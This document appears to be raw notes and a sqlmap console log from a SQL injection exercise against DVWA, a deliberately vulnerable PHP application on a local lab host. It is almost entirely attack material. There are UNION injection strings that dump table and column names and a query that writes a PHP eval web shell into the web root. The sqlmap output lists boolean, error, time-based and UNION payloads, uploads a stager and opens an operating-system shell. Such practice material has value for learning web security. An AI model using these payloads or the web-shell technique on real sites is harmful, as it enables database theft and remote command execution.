?id=xx'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'-- +
?id=xx'+union+select+1,column_name from information_schema.columns where table_name='users'-- +
select "<?php @eval($_GET['cmd']);?>" into outfile 'c:\\phpStudy\\WWW\\dvwa\\ttt.php';
___
__H__
___ ___[']_____ ___ ___ {1.1.4.16#dev}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:42:39
[09:42:39] [INFO] resuming back-end DBMS 'mysql'
[09:42:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1' OR NOT 1977=1977#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5)-- peqj&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit
---
[09:42:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:42:39] [INFO] going to use a web backdoor for command prompt
[09:42:39] [INFO] fingerprinting the back-end DBMS operating system
[09:42:39] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[09:42:43] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA
[09:42:51] [WARNING] unable to automatically parse any web server path
[09:42:51] [INFO] trying to upload the file stager on 'C:/phpStudy/WWW/DVWA/' via LIMIT 'LINES TERMINATED BY' method
[09:42:51] [INFO] heuristics detected web page charset 'ascii'
[09:42:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] y
[09:42:56] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
驅動器 C 中的卷是 BOOTCAMP
卷的序列號是 D89B-813F
C:\phpStudy\WWW\DVWA 的目錄
2017-05-16 09:42 <DIR> .
2017-05-16 09:42 <DIR> ..
2015-10-05 15:51 500 .htaccess
2015-10-05 15:51 3,845 about.php
2015-10-05 15:51 7,229 CHANGELOG.md
2017-04-25 09:18 <DIR> config
2015-10-05 15:51 33,107 COPYING.txt
2017-04-25 09:18 <DIR> docs
2017-04-25 09:18 <DIR> dvwa
2017-04-25 09:18 <DIR> external
2015-10-05 15:51 1,406 favicon.ico
2017-04-25 09:18 <DIR> hackable
2015-10-05 15:51 895 ids_log.php
2015-10-05 15:51 4,389 index.php
2015-10-05 15:51 1,869 instructions.php
2015-10-05 15:51 3,522 login.php
2015-10-05 15:51 414 logout.php
2015-10-05 15:51 148 php.ini
2015-10-05 15:51 199 phpinfo.php
2015-10-05 15:51 7,651 README.md
2015-10-05 15:51 26 robots.txt
2015-10-05 15:51 4,686 security.php
2015-10-05 15:51 2,364 setup.php
2017-05-04 20:59 466 test.php
2017-05-16 09:42 908 tmpbhbmv.php
2017-05-16 09:42 727 tmpummkl.php
2017-05-15 21:11 29 ttt.php
2017-04-25 09:18 <DIR> vulnerabilities
20 個文件 74,380 字節
8 個目錄 18,391,883,776 可用字節
---
os-shell> x
[09:43:02] [INFO] cleaning up the web files uploaded
[09:43:02] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[09:43:02] [INFO] fetched data logged to text files under 'C:\Users\zptxwd\.sqlmap\output\192.168.3.88'
[*] shutting down at 09:43:03
medium.
medium.